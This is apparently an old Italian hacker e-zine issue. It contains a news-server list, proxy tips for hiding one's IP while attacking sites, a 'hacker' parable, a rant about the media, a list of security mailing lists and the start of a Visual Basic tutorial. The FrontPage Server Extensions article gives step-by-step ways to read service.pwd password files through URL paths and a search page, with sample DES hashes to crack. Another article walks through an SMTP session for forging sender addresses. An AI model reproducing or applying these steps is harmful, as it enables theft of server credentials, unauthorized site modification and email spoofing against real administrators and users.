agnese.viesse.it 1915 2.22k/sec www.siast.sk.ca 1828 3.66k/sec porto.areti.com 1698 4.31k/sec www.an.cc.mn.us 1543 3.41k/sec news.ajou.ac.kr 1439 4.97k/sec sofia-inner.ctrl-c.liu.se 1414 4.05k/sec tern.pppl.gov 1401 3.76k/sec cc.owu.edu 1399 1.56k/sec gateway.ubc.co.jp 1322 4.41k/sec news.lsumc.edu 1243 2.05k/sec ns.kix.or.jp 1193 4.62k/sec news.infosky.net 1183 3.61k/sec loriot.cs.uni-magdeburg.de 1093 0.25k/sec 204.225.98.10 1050 5.40k/sec sparks.flora.ottawa.on.ca 1020 7.98k/sec www.aaol.com 1016 5.44k/sec sol.tins.net 1016 4.90k/sec 193.155.242.54 940 2.90k/sec itaiba.di.ufpe.br 916 5.88k/sec vesta.prenhall.com 853 4.20k/sec 160.198.17.6 640 2.46k/sec chinese.iie.ncku.edu.tw 551 0.11k/sec learnet.freenet.hut.fi 517 4.64k/sec ns.ncd.co.jp 447 2.00k/sec sunsite.auc.dk 444 6.29k/sec sun579.rz.ruhr-uni-bochum.de 390 2.38k/sec diesel.cu.mi.it 390 1.95k/sec oravannahka-lane.helsinki.fi 365 4.02k/sec pollux.goe.ni.schule.de 350 3.01k/sec news.woobe.com.tw 329 2.08k/sec news.udel.edu 313 3.62k/sec peabody.colorado.edu 297 4.14k/sec lace.colorado.edu 297 4.14k/sec news.vanderbilt.edu 281 5.83k/sec tindur.vks.is 279 1.49k/sec service.symantec.com 273 4.72k/sec frmug.org 239 1.75k/sec ftp.chip.pl 237 1.88k/sec gudmund.hordaland.vgs.no 231 3.12k/sec pula.financenet.gov 223 3.94k/sec jasmine.govnews.org 223 3.94k/sec dogwood.fernuni-hagen.de 223 1.55k/sec polonez.man.lodz.pl 221 1.85k/sec lena.prz.rzeszow.pl 213 2.24k/sec ns3.umkc.edu 203 3.10k/sec fb1.euro.net 203 2.07k/sec bee.cs.kiev.ua 183 1.96k/sec netra.msu.montana.edu 173 3.51k/sec miriam.fuller.edu 165 2.34k/sec trurl.ispid.com.pl 159 2.22k/sec forums.novell.com 157 4.12k/sec news.sti.com.br 155 0.76k/sec rock.afsac.wpafb.af.mil 154 3.17k/sec news.hanyang.ac.kr 147 3.16k/sec falcon2.ship.its.uwo.ca 147 1.45k/sec news.depaul.edu 144 1.73k/sec globo.edinfor.pt 144 1.26k/sec bagan.srce.hr 135 0.88k/sec argos.sae.gr 132 0.21k/sec forums.inprise.com 131 3.59k/sec sol.sun.csd.unb.ca 125 3.00k/sec news.hanq.net 124 1.69k/sec usenet.kornet.nm.kr 121 2.58k/sec medinet.meditex.es 109 2.53k/sec nmaster.tin.it 107 2.39k/sec news.tin.it 107 1.59k/sec nascom.naspa.net 105 0.50k/sec info.nsysu.edu.tw 103 0.51k/sec acme.fred.org 102 2.23k/sec Allora ce ne sono per tutti i guti [ Grazie NobodY88 sei mitico ] e passiamo ai proxy che rientrano nel discorso anonimita' nascondendo l'ip [ se la definizione secondo voi e' sbagliata correggetemi mi raccomando ] e sono utilissimi per chi vuole iniziare a fare qualcosa ...... Ok allora la cosa e' semplice [ penso ] voi inserite il proxy al quale vi collegate per poi andare nel sito che dovete hackerare .... L'ip che apparira' nei log sara' quindi quello del proxy e non il vostro [ bellloooo ] > Un consiglio [ utile x gli acquisti [ ma come sono spiritoso ] ] usate anche il mitico ANOMIZZATTORE [ grande quando ne hai bisogno c'e' sempre ] Bho non sto a dilungarmi [ La prossima volta spiego meglio promesso , ora non ce la faccio + ]... ZeroCool ͻ Ŀ LISTA MOLTO BREVE DI PROXY ٺ ͼ webcache.ms.mff.cuni.cz 8080 www/ftp/gopher/wais 195.178.64.178 conan.gocis.bg 8080 www/ftp 195.138.133.11 proxy.co.rmit.edu.au 8080 www/ftp 131.170.32.127 noc.uncu.edu.ar 8080 www/ftp 170.210.2.97 Okkio a non fare casini o almeno usate + proxy in questi modo avrete + tempo x scappare all'estero con i miliardi rubati....hihihi. N0bodY88 ͻ Ŀ METAFORA DEL COWBOY .... ٺ ͼ La leggenda narra che un giorno non troppo lontano un giovane ragazzo americano di nome Hacky di 16 anni disse al padre "Hey daddy I want to be a wolf-hunter!!" (pap voglio diventare un cacciatore di lupi.... per coloro con poca famigliarit con un linguaggio chiamato Inglese ^_^ ), cos il padre gli propose di andare a parlare con quello che era ritenuto il + grande cacciatore di lupi ancora vivente, che tra le altre cose abitava anche dalle sue parti, e cos il giovane cowboy part. Arivvato alla casa del vecchio vi trov ad attenderlo una signora messicana grassa e brutta ma simpatica e cos gli chiese di poter parlare con il vecchio ed ella lo fece entrare, fatto accomodare in una stanza sporca e buia si accorse che il vecchio era steso su di un lettino e farneticava, cos Hacky ansioso e speranzoso chiese al vecchio di parlargli dei lupi e dei suoi metodi di caccia, ma come tutti i vecchi anche questo non rispondeva esattamente a ci che gli chiedeva il giovane ma alle volte dava risposte senza senso per a tratti dalla sua bocca uscivano delle frasi che erano perle di saggezza tipo "il lupo come un fiocco di neve, quando pensi di averlo in pugno ti rendi conto, che riaprendo la mano sparito".Comunque Hacky sent il vecchio che ad un certo punto farfugliava qualcosa sul fuoco ma ormai si era fatto tardi e doveva tornare a casa, quindi lasci la casa e intraprese la via del ritorno. Giunto ormai a + di met strada vide un vecchio bivacco per cowboy messicani e ricordandosi le parole del vecchio gli venne l'idea di mettere una trappola vicino al bivacco col fuocherello, e cos fece, posizion la trappola e scrisse un cartello in messicano che diceva "Trappola per lupi Attenzione", quindi torn a casa. Giunto a casa il giovane entusiasta raccont al padre tutto ci che gli era successo e gli spieg la sua idea della trappola. Il padre gli rispose "Bravo Coglione, tu pensi che dei cowboy messicani sappiano leggere? Domattina prima dell'alba andrai a smontare la tua trappola". Cos Hacky il mattino successivo si svegli presto ed intraprese il cammino, se non che arrivato al bivacco, si accorse che una stupenda lupa dal pelo argenteo era caduta nella sua trappola. Hacky si avvicin di soppiatto e riusc a mettere un bastone tra le fauci della lupa e con una corda a bloccare il bastone in modo da ricreare una specie di museruola.Il ragazzo decise che avrebbe riportato la lupa a casa sua: in Messico (gli americani pensano sempre che il nemico venga da fuori al loro stato....kiss perch?!?!?!?). Hacky si ingegn e trov un sistema per poter fare in modo da legare la lupa al cavallo in modo da non farlo sbranare.....cos durante la strada Hacky cerc di far amicizia con la lupa e molto pazientemente ogni giorno tentava di nutrire con dei pezzettini di fegato la lupa attraverso quell'unico spiraglio che c'era tra la museruola e la gola dell'animale.... Il primo giorno la lupa non mangi, il secondo giorno la lupa non mangi, ma il terzo aveva fame e dovette accettare il cibo, cos pian piano i 2 divennero amici.Un giorno ritornando da un' osteria in cui si era fermato trov la lupa senza museruola, e con calma si avvicin alla lupa che si fece rimettere la museruola. Il viaggio dei 2 continuava e il giovane avrebbe riportato la lupa a casa se un giorno non avvesse incontrato in una sperduta cittadina al confine col Messico un posto di blocco, la polizia fu ferma e decisa e sequestr la lupa al giovane.Hacky per si ripropose, che a qualunque costo avrebbe raggiunto il suo scopo e che sarebbe sempre rimasto accanto alla lupa. Cos aspett ed aspett finch un giorno vide che la lupa fu caricata in una cassa e portata ad una fiera e l venne esposta. Al prezzo di pochi cents si poteva vedere quella che, a quanto dicevano i cartelli era la lupa + feroce che si era mai vista, una mangiatrice di uomini, una divoratrice di mandrie ect. ect. Alla fine della giornata Hacky chiese gentilmente di poter vedere la lupa spiegando che in precedenza era stata in suo possesso e fu accontentato. Il cowboy che era un tipo di poche parole si ritrov in una situazione in cui qualcosa la doveva dire per forza e cos fece un breve ma intenso discorso all' animale che sembrava capire tutto ci che il c-boy le diceva. 2 giorni dopo la lupa fu trasferita in un altro tendone, come una specie di arena, ma un p + piccola, circolare con un palo al centro, dove la lupa era legata per mezzo di una catena. Si potevano contare tre passi e poi ancora tre passi per arrivare al palo, ma la catena copriva solamente la met di quella distanza (3 passi per chi non avesse capito :-P ) dei cani da combattimento venivano aizzati verso la lupa e dei messicani sugli spalti scommettevano sulla sorte della lupa. Hacky entr nella tende, vide quello spettacolo,e rimase calmo si sedette e vide 2 cani che attaccavano la lupa, la lupa ammzz il primo con un sol colpo, col secondo ingaggi una piccola lotta ma lo uccise dopo pochi istanti. Hacky si volt verso il messicano che gli sedeva accanto e gli chiese quanti cani ancora ci fossero, ed egli gli rispose "Bastante" (abbastanza).Hacky usc dal tendone per ritornarci solo qualche ora dopo, ritrov la lupa, azzuffata, insanguinata, ma ancora viva.Cos entr nell'arena tra le urla dei messicani (che non avevano mai smesso di scommettere) fece il primo passo, poi il secondo, ed ancora il terzo... parecchi si erano spinti fino l, ma nessuno oltre.Fece un altro passo e tutti tacquero. Il ragazzo si avvicin al palo, sganci la catena, si volt verso il pubblico, ma non trov neanche uno sguardo benevolo nei suoi confronti, cos prese la lupa e disse "Es Mia" ( mia)e se ne and The end Dov' la metafora??? Ora voi mi chiederete appunto "Dov' la metafora???" io vi risponderei "kakkio ci sono 30mila metafore in questo racconto e non ne avete scovata neanche una???" :-) Il racconto una metafora della vita di ogni Hacker ed in generale della vita di ognuno di noi : 1-Il ragazzo voleva raggiungere un obbiettivo ma ha dovuto sudare per raggiungerlo, ha cercato di reperire informazioni per diventare un wolf-hunter cos ogni Hacker per tentare di imparare tenta di reperire informazioni in ogni modo (vedi Docz Tutorials ect. ect.) ma esse sono sempre confuse ed alle volte piene di elementi superflui da scartare, il buon allievo deve saper scartare le superflue per badare alle essenziali. 2-Trovi sempre qualcuno, anche il tuo + fedele amico(padre) che pronto a denigrare il tuo lavoro e a tentare di affondare le tue buone idee. 3-Avvicinati con cautela all'hacking e prendi tutte le possibili precauzioni. 4-Ogni giorno pian piano allenandoti vicino al comp cerca di diventargli sempre + amico e di passare il maggior tempo possibile vicino ad esso. (imbocca la lupa giorno per giorno) 5-Una volta diventato lupa (hacker) ricordati sempre che il tuo animo deve essere per met quello del cowboy (paziente e di poche parole) e per met quello della lupa (aggressivo spietato e cattivo) 6-Quando pensi di essere riuscito a fare ci che volevi la maggior parte delle volte non cos (non dire gatto se non ce l'hai nel sacco!!) 7-Anche se non riesci nel tuo scopo, non demordere mai, se hai la testa dura come il piombo, ed una volont di ferro,ce la farai!!!! 8-Non lasciare mai che tu sia esposto o paragonato ad un fenomeno da baraccone. (non dire in giro ci che fai o ci che sai fare). 9-Spesso ti troverai a combattere, solo quando sarai allo stremo delle tue forze e solo allora si vedr veramente quanto vali. 10-Troverai sempre qualcuno pronto a scommettere contro di te. Sii calmo come il cow-boy ma lotta come la lupa. Mettiglielo nel culo a quei bastardi!!!!! 11-Esci dalla massa, fai un passo in + degli altri, sperimenta nuove tecniche ect. ect. 12-Trova sempre il coraggio di assumerti le tue responsabilit di prenderti i tuoi meriti, alza lo sguardo verso quello degli altri e digli "Es mia". Beh penso proprio di aver finito ...... spero di essere stato abbastanza esaudiente.....di avervi divertito e non annoiato.....di avervi arricchito interiormente e magari che questa storia rimanga eterna in internet per sempre...kiss?!?!?! Vorrei dedicare questa storia un p a tutti gli amici che la sera mi tengono compagnia in IRC......DevilNet (a quando il prossimo soft phreakin' assault???) :-)Game (il gioco non finisce mai) Nemo Razorinfo Roby 02 Bypo Eh(m)m Lucy (una BOTta e via!!!) Net_G Linbus NSOFT drx ghost e sopratutto MsBliSs ***My net-girl-friend*** insomma tutti gli amici di #darkplace #hacker.it #hackers.it e #phreak.it. irc.stealth.net By Dante Alighieri :-) ͻ Ŀ Manipolati SI Manipolati NO?! ٺ ͼ MATERIALE: Una penna di struzzo una boccietta di inchiostro di china ed una pergamena circa del 1700. ORE: Preferibilmente ore pasti al numero in sovraimpressione, hum mi s che non centra nulla, humm vabb :) OGGETTO: Manipolati SI Manipolati NO?! (fottiamo il sistema?!) SCOPO: BHO informativo?! BHO!? fatene quello che volete, IO non centro nulla :) INIZIO!!!!!!!!!!!! PRIMA DI TUTTO RINGRAZIO ZEROCOOL E NOBODY88 PER AVERMI FATTO PARTECIPE DELLA LORO INIZIATIVA CHE DOVREBBE ESSERE D'ESEMPIO :-), E POI PERCH SONO DEI MATTACCHIONI DELLA RETE CHE NESSUNO SA MA SONO DEI POLIZIOTTI CON LA PANCIA ED I BAFFONI ORMAI SCOLORITI DALLA NICOTINA, E CON LE PALLE IRRITATE DALLE GRATTATE DI ORE ED ORE SEDUTI SU UNA SEDIA BRUTTA E VECCHIA ( TUTTO VEROOOOOO) :))))))))) ALLURA inizio rompendovi un p le palle cercando di farvi capire, che non sono un istigatore ne un rivoluzionario che cerca di minare il nostro bellissimo sistema (PRUUURURURUUUU),quindi spero che non cercate di denunciarmi e farmi diventare cos un esiliato politico :-). Adesso spero abbiate capito tutto, anche se c' poco da capire, iniziamo con spiegare semplicemente con qualche esempio, il perch dobbiamo non credere a tutto ci che ci propinano, e che il nostro sistema (intendo tutto il sistema non solo quello italiano) ci manipola: {{{HALT!! quasi dimenticavo, non st scivendo una BIBBIA quindi potete anche ridere e pensare: ma questo propio BIP BIP BIP BIP BIP BIP BIP BIP e cos via:-) leggete con poca o molta attenzione per poi elaborare e magari demolire la mia idea, d liberta di parola IO!! :-) }}} OK a posto adesso si pu iniziare, il mio motto semplice, conciso, ma EFFICACE. Perch propio quello che non fanno i mass-media che con la mal informazione tendono la maggior parte di noi in uno stato di semi catalessi e ignoranza, attenzione per mal informazione si intende informazione non fatta male, ma propio un informazione cattiva, nel senso che le informazioni vengono passate al pubblico in maniera molto efficente ma allo stesso tempo sono informazioni cattive e cio PILOTATE; voi vi chiederete: ma pilotata da chi??????????, ed io vi rispondo ma dal SISTEMA ovviamente che allo stesso tempo viene pilotato dai POLITICI che allo stesso tempo vengono pilotati dal SISTEMA, insomma noi siamo il sistema che viene fatto da noi :-) heheh e qua ci dovete ragionare. Adesso uno si chiede ma come f a funzionare questo "sistema"???!, semplice, basandosi sul fatto che la maggior parte della gente crede che sotto la poca informazione ci sia un complotto (vedi la STORIA), il sistema fa semplicemente l'opposto, cio DICENDO TUTTO PER NON DIRE NULLA!!! Facendoci credere che sia tutto come dicono loro ed imbambioccandoci come allocchi. Un esempio veloce veloce?! LE DROGHE ALCOL= droga legale, e pubblica (soldi allo stato molti) che viene pure pubblicizzata MA COCAINA EROINA ASHISH MARJUANA DROGHE SINTETICHE etcc...= droghe illegali ma pubbliche, (soldi agli stati MOLTI DI PIU' DI QUELLE LEGALI come l'ALCOL) credete che queste droghe entrino negli stati semplicemente nelle gomme delle macchine o negli asciugamani??? tutto esclusivamente illegalmente??? BHE se pensate di SI allora siete o state per cadere nella "gabbia" del sistema, ma siete ancora in tempo ad "EVADEREEEEEEE". A questo punto uno legge tutto ci e dice: OK OK siamo manipolati ed allora??? come faccio a cercare di cambiare almeno nel mio piccolo, oppure come faccio a fare le cose alla grande senza essere corrotto dal SISTEMA???!! BHE prima di tutto, pensate con la vostra testa che gi difficile, poi bisogna lavorare nascosti per non venir "corrotti", e dato che avete prelevato tutto ci dalla RETE iniziate con il battervi per tenere la rete libera da ogni tipo di manipolazione, magari seguendo i consigli riportati dai miei amici qu di seguito. ADOTTANDO OGNI TIPO DI SOLUZIONE DATA MAGARI DAL TIPO DI PROGRAMMA CHE USERETE :-) :-) ;) SpIRIToZ POST/SCRITUM (P/S):D SE NON VI PIACE, O VI PIACE, O VOLETE ESPRIMERE TUTTA LA VOSTRA RABBIA SU QUELLO CHE HO SCRITTO, O VOLETE PRESENTARMI VOSTRA MOGLIE PERCH COLPITI DA QUELLO CHE HO SCRITTO :-) MI TROVATE: ^^^^^^spiritoz@nfmail.com^^^^^^ oppure su #hacker.it ore pasti al seguente numero di telefono 055.144.255.222 az scusate mi confondo sempre, quello il mio secondo lavoro :) ciaooooooooooooooooooooooooooooooooooooooooooooooooooooooooo e leggete tutto mi raccomando:-)))) e OCCHIO AGLI SBIRROZZI ZI ZI ZI ZI ZIZ IZ ZI ZI Z!!!!!!! ͻ Ŀ UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES ٺ ͼ UN PO' DI MAILING LIST ESSENZIALI X HACKERS E NEWBIES Ciao a tutti quello che vi parla e' CrazyCrom uno dei tanti newbie che ogni sera si fa na sega mentale sopra ai doc e ai txt di gente con nomi assurdi che spiegano questo e quello. N0bodY88 mi ha chiesto se volevo partecipare a quest'avventura della ezine e io gli ho risposto "Caspiterina, ci puoi scommettere la terza gamba che hai tra le altre due che ci sto!" e cosi' eccomi qua. Siccome non ho molte conoscenze a livello di H/P/C dato che anch'io come molti mi sono avvicinato alla materia da poco, ho pensato di proporre un articolo sulle (o meglio un elenco di) mailing list (purtroppo solo in inglese, e se ne conoscete in italiano mandatemi una mail appena accendete il vostro computer) che possono interessare sia quelli come me, quindi newbies, che quelli che sono nell'elite da mesi/anni, perche', come si sa, non si finisce mai di imparare. Le info da me qui elencate sono prese dalla FAQ Security Mailing Lists che ho tradotto in parte. Riporto qui sotto l'elenco delle mailing liste imo (x chi non sa cosa voglia dire = In My Opinion) piu' importanti e utili. Ma prima qualcuno potrebbe dire..... "A che ****** puo' servire leggersi una mole spropositata di lettere per di piu' in inglese?" e io risponderei: 1) se non si sa l'inglese in rete (secondo me) oltre a www.repubblica.it non si va molto avanti (senza offesa) 2) se voi potreste scegliere tra leggere dei txt del 1997 in inglese di un certo XYZ che vive oltreoceano oppure avere info sugli ultimi bug scoperti da poco nei vari prog e so cosa decidereste? NOME = Alert INDIRIZZO X REGISTRARSI = majordomo@iss.net COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe alert" (non gli apici!!!!) COME TOGLIERSI DALLA ML = mettere nel corpo della mail "unsubscribe alert" (allo stesso indirizzo) ULTERIORI INFO = questa e' una lista moderata che tratta argomenti quali l'annuncio di nuovi prodotti per la sicurezza e degli aggiornamenti di tali prodotti, la comunicazione di nuove vulnerabilita' trovate, l'annuncio di nuove FAQ sulla sicurezza, e per ultimo la diffusione delle tecniche e delle consapevolezze degli intrusi. NOME = Best of Security INDIRIZZO X REGISTRARSI = best-of-security-request@suburbia.net COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe best-of-security" ULTERIORI INFO = questa e' una lista non moderata. Altre info le attendo io che dal testo inglese non ho capito molto, quindi, piuttosto di dire cazzate sto zitto...cmq dal nome non sembrerebbe parlare di fiori o animali... NOME = Bugtraq INDIRIZZO X REGISTRARSI = listserv@netspace.org COME REGISTRARSI= mandare una email mettendo nel corpo "SUBSCRIBE BUGTRAQ" (tutto maiuscolo) ULTERIORI INFO = questa e' una lista per particolareggiate discussioni sui buchi/bug che possono compomettere la sicurezza dei sistemi UNIX; tratta di cosa sono, come sfruttarli, e come fare x sistemarli. Nel manifesto (si dice cosi'?) della lista e' esplicitamente spiegato che "questa lista non si occupa di come crackare i sistemi e di come sfruttare le loro vulnerabilita', ma si occupa invece di definirli, riconoscerli e prevenire l'uso dei buchi e i relativi rischi". Sono accettate dal topic tutte le informazioni sui buchi e sulle backdoor passate e presenti e sui prog sfruttanti tali vulnerabilita' su sitemi UNIX. NOME = COAST Security Archive INDIRIZZO X REGISTRARSI = coast-request@cs.purdue.edu COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE coast" ULTERIORI INFO = La lista si occupa del Purdue's COAST Security Archive NOME = Computer Privacy Digest INDIRIZZO X REGISTRARSI = comp-privacy-request@uwm.edu COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe cpd" ULTERIORI INFO = Il Computer PRIVACY Digest (un tempo Telecom Privacy Digest) e' seguito da Leonard P. Levine ed e' collegato al ng comp.society.privacy e tratta in sostanza degli effetti della tecnologia sulla privacy. Se siete di quelli che vogliono querelare qlc1 xche' vi ha chiamato co il vs vero nome, questa ml e' fatta per voi...penso :-) NOME = Computer Underground Digest INDIRIZZO X REGISTRARSI = cu-digest-request@weber.ucsd.edu COME REGISTRARSI = mandare una email mettendo nel corpo "SUB CUDIGEST" (tutto maiuscolo) ULTERIORI INFO = CuD e' disponibile anche sotto forma di newsgroup come: comp.society.cu-digest . NOME = Euro Firewalls INDIRIZZO X REGISTRARSI = majordomo@gbnet.net COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE firewalls-uk email-addr" dove email-addr sta per l'indirizzo in cui volete ricevere la ml (es: "SUBSCRIBE firewalls-uk crazy@tin.it) ULTERIORI INFO = Lista che tratta i firewalls del nostro continente. NOME = Firewalls INDIRIZZO X REGISTRARSI = majordomo@lists.gnac.net COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE firewalls" ULTERIORI INFO = lista che tratta di utili info riguardo i firewall e come implementare la loro sicurezza. NOME = INFSEC-L Information System Security Forum INDIRIZZO X REGISTRARSI = listserv@etsuadmn.etsu.edu COME REGISTRARSI = mandare la email mettendo nel corpo"SUB infsec.l your-name" (y-n=vs nome) :P ULTERIORI INFO = questa lista tratta di info su sistemi di sicurezza e argomenti correlati. NOME = Intrusion Detection Systems INDIRIZZO X REGISTRARSI = majordomo@uow.edu.au COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe ids" ULTERIORI INFO = questa lista tratta di tecniche usate x scoprire intrusi nelle reti di computer (se li conoscete...li evitate :-), di controlli dei filtri (non delle macchine...), di info su conoscenze di sistemi esperti, reti neurali (se qualcuno ne sa qlc mi scriva), metodi usati dagli intrusi, script e strumenti usati dagli hackers (quelli che si stanno sbellicando dalle risate sugli infiniti errori di questo mio articolo...) NOME = NTBugtraq INDIRIZZO X REGISTRARSI = listserv@listserv.ntbugtraq.com COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe ntbugtraq" COME TOGLIERSI DALLA ML = mandare una mail mettendo nel corpo "unsubscribe ntbugtraq" ULTERIORI INFO = questa lista tratta dei buchi/bug della sicurezza in Windows NT e di coem sfruttare tali bug (exploit) x compromettere la sicurezza del sistema NT. NOME = NT Security INDIRIZZO X REGISTRARSI = majordomo@iss.net COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe ntsecurity" COME TOGLIERSI DALLA ML = mandare un mail mettendo nel corpo "unsubscribe ntsecurity" ULTERIORI INFO = questa lista tratta della sicurezza di NT, e' una lista moderata. Anche se dal nome non sembrerebbe questa ml tratta anche dei problemi di Windows 95, Windows For Work Group riguardo alla sicurezza. NOME = Phrack INDIRIZZO X REGISTRARSI = phrack@well.com COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE Phrack" ULTERIORI INFO = Phrack e' una e-zine/magazine americana che tratta sia di hacking che di phreaking. NOME = Secure HTTP INDIRIZZO X REGISTRARSI = shttp-talk-request@OpenMarket.com COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE" ULTERIORI INFO = questa lista serve a chi si interessa delle potenzialita' del SHTTP. NOME = Virus INDIRIZZO X REGISTRARSI = listserv@lehigh.edu COME REGISTRARSI = mandare una email mettendo nel corpo "SUBSCRIBE virus-l your-name" ULTERIORI INFO = questa lista serve per le discussioni su vecchi virus e per le proposte di nuove idee su virus; puo' includere le prevenzioni da virus, e le domande/risposte su determinati virus; la lista e' moderata ed e' presente nei newsgroup come comp.virus. NOME = CERT (Computer Emergency Response Team) Advisory mailing list INDIRIZZO X REGISTRARSI = cert@cert.org COME REGISTRARSI = mandare una email mettendo nel corpo "I want to be on your mailing list" ULTERIORI INFO = l'ftp del CERT ha l'ip 192.88.209.5 e da li' potete scaricare vecchie info gia passate sulla mailing list, accedendovi come utente ANONYMOUS NOME = Cryptography INDIRIZZO X REGISTRARSI = majordomo@c2.net COME REGISTRARSI = mandare una email mettendo nel corpo "subscribe cryptography" ULTERIORI INFO = questa lista si occupa della crittografia analizzandone sia gli algoritmi e l'accortezza con i quali sono stati creati Ora che vi ho fatto questo breve (mica tanto...) elenco delle ml ci tengo a precisare che gli apici non vanno, in tutte si parla in inglese, e che se almeno uno solo di voi si "sottoscrivera' " qualcuna di queste ml allora il mio lavoro sara' servito! Saluto tutti voi newbies e gli hacker che saranno arrivati alla fine del mio articolo (veramente pochi...credo...hihihihihihi). Un saluto speciale a N0bodY88, a ZeroCool e a tutto il Newbies Staff che forse un giorno fara' parte del passato della scena italiana.........hihihihihihihi PS: mi hanno appena comunicato che ci dovrebbe essere una mailing list sul C++ (so che non c'entra una mazza...forse) in ITALIANO e ci si puo' iscrivere andando su http://welcome.to/C++Warriors PSS: io non sono ancora andato a vedere la ml ma leggete un po' di msg prima di postare, cosi' come si dovrebbe fare nei newsgroup.......in teoria..... Ciauzzzz CrazyCrom ͻ Ŀ FRONTPAGE SERVER EXTENSIONS ٺ ͼ ****************************************************************************** Questo materiale e' scritto a puro scopo educativo ed informativo. L'autore non ha responsabilit alcuna sulle azioni che potrebbero essere compiute dopo aver letto il seguente documento. Tutte le informazioni presenti in questo documento si sarebbero potute trovare usando un motore di ricerca. ****************************************************************************** Bene bene, vorrei parlarvi di un bel programmino: FrontPage. Come tutti saprete FrontPage (che chiamer FP d'ora in avanti) serve a creare siti web, per in pi rispetto a un semplice editor Html ha la possibilit di utilizzare dei programmini che vengono forniti insieme. Per il corretto funzionamento di questi programmini necessario per che nel server in qui andranno messi siti fatti con FP siano installate le FrontPage Server Extensions. Come sempre per i prodotti M$ la creazione di un nuovo prodotto coincide con la scoperta di una nuova backdoor (ormai credo che sia sempre pi una politica aziendale 8oD). Bene vediamo cosa mette a disposizione lo zio questa volta. Poniamo il caso di un sysadmin che abbia Windows NT 4.0 e ISS 3.0 e che decida di installare le solite estensioni di FP. Bene a sua insaputa FP creer l'everyone group per avere accesso al server tramite il FP Explorer. Il punto che il sysadmin non lo sa e quindi l'accesso rimane senza password permettendo cos a chiunque di modificare le sue pagine Web! Se questo non dovesse funzionare possiamo a provare a fare una altra cosa. Apriamo il nostro browser e scriviamo: http://www.sito.com/samples/search/queryhit.htm Ora nella maschera di ricerca scriviamo service.pwd oppure *.pwd. Se il sysadmin non ha modificato le impostazioni standard saremo in grado di leggere ogni file nell'area di ricerca da lui scelta! Ah per chi non lo sapesse nel file service.pwd ci sono delle belle ed ambite password :-). Spiegher poi come sfruttare questi file, nel frattempo salvateli :-). Ora zio Bill dice: "Ma cazzo lo sanno tutti che NT fa schifo e cos sanno anche che se non entro da questa porta entro dalle finestre (Windows), facciamo qualcosa per incasinare anche Unix" Voi direte: "Ma chi cos imbecille da installarsi le estensioni di FP per Unix?" Io vi rispondo: "Chi ha coraggio da vendere, chi se ne frega della sicurezza e a chi importa solo fare soldi, in pratica la maggior parte dei sysadmin" Se avete una shell nel provider con installate le estensioni di FP per Unix scrivete: find / -name service.pwd -print A volte avrete anche l'accesso in scrittura al file service.pwd dunque potreste anche aggiungere degli account, vedete un po' voi cosa vi conviene fare (personalmente sconsiglio di aggiungere nuovi account). Ma se non avete una shell non abbiate paura giusto dare a tutti una possibilit. Apriamo il nostro browser e scriviamo: http://www.sito.com/_vti_pvt/service.pwd e se i permessi d'accesso sono sbagliati (come lo sono facendo l'installazione) vedremo il solito file delle password. Ora a seconda dei casi nel file service.pwd troverete delle righe di questo tipo: root:PGhYLElPqvzEA gianni:PvGmpP00M9suM Non vi preoccupate la prima parte il login la seconda la password criptata tramite l'algoritmo DES. Ora prendete le righe e aggiungete un po' di roba come volete per farla diventare come quella di qui sotto. root:PGhYLElPqvzEA:0:0:cheneso:/:/bin/csh Ora lanciate Cracker Jack, John the Ripper o quello che volte e trovate le password. Se dopo questi account si rivelano validi non solo per FP ma anche per le shell di quel server, bhe non mica colpa vostra 8oD. Per questa volta ho finito, magari la prossima volta faccio un articoletto di Phreaking che sarebbe il mio campo naturale P.S. La prima volta che vi capita di usare un password cracker mettete dentro anche i 2 account di esempio e se trovate le password speditemele all'indirizzo: blum@cybergal.com Blum ͻ Ŀ E-mail assolutamente anonime! ٺ ͼ Created by AX1S Allora, prima di tutto una piccola premessa: questo metodo funziona, per quanto ne so, solo con un server SendMail versione inferiore o uguale alla 8.8.8. Forse si pu usare anche con la 8.9 ma non ne sono sicuro. io: Connect hostname.com 25 SMTP: 220 hostname.com ESMTP Sendmail 8.8.5/8.8.5; Thu, 28 Jan 1999 22:50:35 +0100 io: HELO (insrire qui almeno 600 lettere. Non so il numero preciso) SMTP: Welcome il_mio_ip@iol.it please to meet you. io: RSET SMTP: Reset state io: MAIL FROM: nessuno@niente.it SMTP: sender ok! io: RCPT TO: nome@vittima.it SMTP: recepient ok! io: DATA SMTP: Enter mail, end with "." on a line by itself io: - messaggio - . io: Quit. Attenzione!!! Quando si inserisce il nome falso del mittente bisogna usare l'espressione nome@provider.com. Inserendo "anonymous", per esempio, sugli header apparir questo: Return-Path: Non necessario che il nome del mittente esista davvero ma deve essere scritto nella suddetta forma. Un consiglio: per velocizzare l'operazione occorre avere un client telnet in grado di fare le operazioni copia/incolla.Basterebbe infatti scrivere tutto su un block notes e poi copiarlo. Questo exploit vi rende anonimi a chi riceve la mail ma non per il server SMTP che logga tutte le connessioni. Se preferite essere anonimi anche li allora dovete connettervi al server di posta facendo una redirezione. Ciaoz AX1S ͻ Ŀ VISUAL BASIC TUTORIAL [ prima parte ] ٺ ͼ Ok ragazzi, benvenuti nel mondo del Visual Basic. Questa "guida" sar un semplice strumento per introdurvi all'uso di questo ambiente di sviluppo. Prima di tutto cosa il Visual Basic? si tratta essenzialmente di un linguaggio orientato agli oggetti. Semma sul significato di "linugaggio orientato agli oggetti" ci torneremo... non importatissimo per cominciare. Per il momento ci limiteremo a dire che, generalmente, un OOL su basa sulla gestione di eventi. Un evento altro non che un avvenimetno che si verifica durante l'esecuzione del programma ( un evento la pressione di un bottone, la digitazione di qualcosa su una casella di testo e cos via). Noi (programmatori) dobbiamo creare una gestione degli eventi (ad es. decidiamo cosa succede alla pressione di un bottone, ...). Ma ora basta con le nozioncine, dedichiamoci a qualcosa di pi pratico (se ho lasciato qualcosa lo aggiunger nei prossimi numeri). Oggi parleremo della creazione di semplici form e faremo qualche esperimento creando un semplice programma. Un 